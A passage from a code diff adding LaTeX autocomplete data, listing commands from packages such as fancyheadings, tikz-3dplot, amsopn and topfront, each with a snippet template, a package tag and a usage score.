'fancyheadings-cmd', + score: 0.0015373246231684555, + }, + { + caption: '\\footruleskip', + snippet: '\\footruleskip', + meta: 'fancyheadings-cmd', + score: 0.000830117957327721, + }, + { + caption: '\\fancyheadoffset[]{}', + snippet: '\\fancyheadoffset[$1]{$2}', + meta: 'fancyheadings-cmd', + score: 0.0016786568695309166, + }, + { + caption: '\\fancyheadoffset{}', + snippet: '\\fancyheadoffset{$1}', + meta: 'fancyheadings-cmd', + score: 0.0016786568695309166, + }, + { + caption: '\\iffloatpage{}{}', + snippet: '\\iffloatpage{$1}{$2}', + meta: 'fancyheadings-cmd', + score: 6.606286310833368e-5, + }, + { + caption: '\\cfoot{}', + snippet: '\\cfoot{$1}', + meta: 'fancyheadings-cmd', + score: 0.013411641301057813, + }, + { + caption: '\\subsectionmark', + snippet: '\\subsectionmark', + meta: 'fancyheadings-cmd', + score: 3.1153423008593836e-5, + }, + { + caption: '\\footrulewidth', + snippet: '\\footrulewidth', + meta: 'fancyheadings-cmd', + score: 0.011424740897486949, + }, + { + caption: '\\fancyhfoffset[]{}', + snippet: '\\fancyhfoffset[$1]{$2}', + meta: 'fancyheadings-cmd', + score: 3.741978601121172e-5, + }, + { + caption: '\\rhead{}', + snippet: '\\rhead{$1}', + meta: 'fancyheadings-cmd', + score: 0.022782817416731292, + }, + { + caption: '\\fancyplain{}{}', + snippet: '\\fancyplain{$1}{$2}', + meta: 'fancyheadings-cmd', + score: 0.007402339896386138, + }, + { + caption: '\\rfoot{}', + snippet: '\\rfoot{$1}', + meta: 'fancyheadings-cmd', + score: 0.013393817825547868, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'fancyheadings-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\plainheadrulewidth', + snippet: '\\plainheadrulewidth', + meta: 'fancyheadings-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\baselinestretch', + snippet: '\\baselinestretch', + meta: 'fancyheadings-cmd', + score: 0.03225350148161425, + }, + { + caption: '\\lfoot{}', + snippet: '\\lfoot{$1}', + meta: 'fancyheadings-cmd', + score: 0.00789399846642229, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'fancyheadings-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'fancyheadings-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\fancyhf{}', + snippet: '\\fancyhf{$1}', + meta: 'fancyheadings-cmd', + score: 0.02314618933449356, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'fancyheadings-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\fancyhead[]{}', + snippet: '\\fancyhead[$1]{$2}', + meta: 'fancyheadings-cmd', + score: 0.039101068064744296, + }, + { + caption: '\\fancyhead{}', + snippet: '\\fancyhead{$1}', + meta: 'fancyheadings-cmd', + score: 0.039101068064744296, + }, + { + caption: '\\nouppercase{}', + snippet: '\\nouppercase{$1}', + meta: 'fancyheadings-cmd', + score: 0.006416387071584083, + }, + { + caption: '\\nouppercase', + snippet: '\\nouppercase', + meta: 'fancyheadings-cmd', + score: 0.006416387071584083, + }, + { + caption: '\\headrule', + snippet: '\\headrule', + meta: 'fancyheadings-cmd', + score: 0.0008327432627715623, + }, + { + caption: '\\headrule{}', + snippet: '\\headrule{$1}', + meta: 'fancyheadings-cmd', + score: 0.0008327432627715623, + }, + { + caption: '\\chead{}', + snippet: '\\chead{$1}', + meta: 'fancyheadings-cmd', + score: 0.00755042164734884, + }, + { + caption: '\\headrulewidth', + snippet: '\\headrulewidth', + meta: 'fancyheadings-cmd', + score: 0.02268137935335823, + }, + ], + 'tikz-3dplot': [ + 
{ + caption: '\\tdplotsetmaincoords{}{}', + snippet: '\\tdplotsetmaincoords{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.00021728148272883815, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-3dplot-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-3dplot-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikz-3dplot-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikz-3dplot-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-3dplot-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-3dplot-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikz-3dplot-cmd', + score: 0.004649150613625593, + }, + { + caption: 
'\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-3dplot-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-3dplot-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-3dplot-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.2864294797053033, + }, + ], + ltxtable: [ + { + caption: '\\let', + snippet: '\\let', + meta: 'ltxtable-cmd', + score: 0.03789745970461662, + }, + { + caption: '\\write', + snippet: '\\write', + meta: 'ltxtable-cmd', + score: 0.0008038857295393196, + }, + { + caption: '\\tabularxcolumn[]{}', + snippet: '\\tabularxcolumn[$1]{$2}', + meta: 'ltxtable-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularxcolumn', + snippet: '\\tabularxcolumn', + meta: 'ltxtable-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularx{}{}', + snippet: '\\tabularx{$1}{$2}', + meta: 'ltxtable-cmd', + score: 0.0005861357565780464, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ltxtable-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'ltxtable-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'ltxtable-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'ltxtable-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ltxtable-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'ltxtable-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ltxtable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + 
snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'ltxtable-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'ltxtable-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'ltxtable-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'ltxtable-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ltxtable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ltxtable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'ltxtable-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'ltxtable-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'ltxtable-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'ltxtable-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'ltxtable-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'ltxtable-cmd', + score: 0.0313525090421608, + }, + ], + pict2e: [ + { + caption: '\\Line', + snippet: '\\Line', + meta: 'pict2e-cmd', + score: 0.0006078790177929149, + }, + { + caption: '\\polygon', + snippet: '\\polygon', + meta: 'pict2e-cmd', + score: 0.0008987552240147395, + }, + { + caption: '\\line', + snippet: '\\line', + meta: 'pict2e-cmd', + score: 0.014519741542622297, + }, + { + caption: '\\polyline', + snippet: '\\polyline', + meta: 'pict2e-cmd', + score: 0.00022468880600368487, + }, + { + caption: '\\vector', + snippet: '\\vector', + meta: 'pict2e-cmd', + score: 0.002970308722584179, + }, + ], + ltablex: [ + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'ltablex-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'ltablex-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'ltablex-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'ltablex-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ltablex-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'ltablex-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ltablex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'ltablex-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'ltablex-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\let', + snippet: '\\let', + meta: 'ltablex-cmd', + score: 0.03789745970461662, + }, + { + caption: '\\write', + snippet: '\\write', + meta: 'ltablex-cmd', + score: 0.0008038857295393196, + }, + { + caption: '\\tabularxcolumn[]{}', + snippet: '\\tabularxcolumn[$1]{$2}', + meta: 'ltablex-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularxcolumn', + snippet: '\\tabularxcolumn', + meta: 'ltablex-cmd', + score: 
0.00048507499766588637, + }, + { + caption: '\\tabularx{}{}', + snippet: '\\tabularx{$1}{$2}', + meta: 'ltablex-cmd', + score: 0.0005861357565780464, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ltablex-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'ltablex-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'ltablex-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ltablex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ltablex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'ltablex-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'ltablex-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'ltablex-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'ltablex-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'ltablex-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'ltablex-cmd', + score: 0.0313525090421608, + }, + ], + amsopn: [ + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'amsopn-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'amsopn-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'amsopn-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'amsopn-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'amsopn-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'amsopn-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'amsopn-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'amsopn-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'amsopn-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'amsopn-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'amsopn-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'amsopn-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'amsopn-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'amsopn-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'amsopn-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'amsopn-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'amsopn-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'amsopn-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'amsopn-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + 
snippet: '\\ln', + meta: 'amsopn-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'amsopn-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'amsopn-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'amsopn-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'amsopn-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'amsopn-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'amsopn-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'amsopn-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'amsopn-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'amsopn-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'amsopn-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'amsopn-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'amsopn-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'amsopn-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'amsopn-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'amsopn-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'amsopn-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'amsopn-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'amsopn-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'amsopn-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'amsopn-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'amsopn-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'amsopn-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'amsopn-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'amsopn-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'amsopn-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'amsopn-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'amsopn-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'amsopn-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'amsopn-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'amsopn-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'amsopn-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'amsopn-cmd', + score: 0.0004286136584068833, + }, + { + caption: 
'\\do', + snippet: '\\do', + meta: 'amsopn-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amsopn-cmd', + score: 0.0063276692758974925, + }, + ], + topcoman: [ + { + caption: '\\listing{}', + snippet: '\\listing{$1}', + meta: 'topcoman-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\micro', + snippet: '\\micro', + meta: 'topcoman-cmd', + score: 0.011051971930487929, + }, + { + caption: '\\gradi', + snippet: '\\gradi', + meta: 'topcoman-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\unit[]{}', + snippet: '\\unit[$1]{$2}', + meta: 'topcoman-cmd', + score: 0.028299796173135428, + }, + { + caption: '\\unit{}', + snippet: '\\unit{$1}', + meta: 'topcoman-cmd', + score: 0.028299796173135428, + }, + { + caption: '\\ped{}', + snippet: '\\ped{$1}', + meta: 'topcoman-cmd', + score: 0.0007129548652040002, + }, + { + caption: '\\ohm', + snippet: '\\ohm', + meta: 'topcoman-cmd', + score: 0.0038146685721293138, + }, + { + caption: '\\gei', + snippet: '\\gei', + meta: 'topcoman-cmd', + score: 0.00023765162173466673, + }, + ], + topfront: [ + { + caption: '\\corsodilaurea{}', + snippet: '\\corsodilaurea{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomeQuartoTomo{}', + snippet: '\\NomeQuartoTomo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\ciclodidottorato{}', + snippet: '\\ciclodidottorato{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\CorsoDiLaureaIn{}', + snippet: '\\CorsoDiLaureaIn{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\ateneo{}', + snippet: '\\ateneo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\retrofrontespizio{}', + snippet: '\\retrofrontespizio{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\InName{}', + snippet: '\\InName{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\secondocandidato{}', + snippet: '\\secondocandidato{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomeMonografia{}', + snippet: '\\NomeMonografia{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomeTutoreAziendale{}', + snippet: '\\NomeTutoreAziendale{$1}', + meta: 'topfront-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\TutorName{}', + snippet: '\\TutorName{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomeDissertazione{}', + snippet: '\\NomeDissertazione{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\sedutadilaurea{}', + snippet: '\\sedutadilaurea{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\logosede{}', + snippet: '\\logosede{$1}', + meta: 'topfront-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\TesiDiLaurea{}', + snippet: '\\TesiDiLaurea{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomeTerzoTomo{}', + snippet: '\\NomeTerzoTomo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\AdvisorName{}', + snippet: '\\AdvisorName{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\facolta[]{}', + snippet: '\\facolta[$1]{$2}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\CycleName{}', + snippet: 
'\\CycleName{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomePrimoTomo{}', + snippet: '\\NomePrimoTomo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\candidato{}', + snippet: '\\candidato{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomeSecondoTomo{}', + snippet: '\\NomeSecondoTomo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\titolo{}', + snippet: '\\titolo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\CandidateName{}', + snippet: '\\CandidateName{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\secondorelatore{}', + snippet: '\\secondorelatore{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\FacoltaDi{}', + snippet: '\\FacoltaDi{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\nomeateneo{}', + snippet: '\\nomeateneo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\DottoratoIn{}', + snippet: '\\DottoratoIn{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\sottotitolo{}', + snippet: '\\sottotitolo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\relatore{}', + snippet: '\\relatore{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\tutoreaziendale{}', + snippet: '\\tutoreaziendale{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + ], + mathspec: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'mathspec-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'mathspec-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'mathspec-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'mathspec-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'mathspec-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'mathspec-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'mathspec-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'mathspec-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'mathspec-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'mathspec-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'mathspec-cmd', 